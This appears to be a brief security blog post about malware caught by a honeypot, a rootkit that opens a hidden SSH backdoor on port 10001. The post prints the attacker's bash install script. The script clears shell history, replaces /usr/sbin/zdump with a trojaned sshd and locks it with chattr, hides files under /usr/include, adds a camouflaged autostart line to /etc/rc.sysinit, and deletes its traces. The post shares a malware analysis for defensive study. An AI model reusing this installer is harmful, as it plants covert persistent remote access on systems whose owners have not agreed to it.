From my initial analysis it appears that the honeypot installs a hidden SSH server running on port 10001.
I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.
If you find anything interesting please free to post a comment.
UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001. Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp
Here is the install script for the main payload. Interesting stuff!
#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
mv libcrypto.so.4 /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks*
No comments:
Post a Comment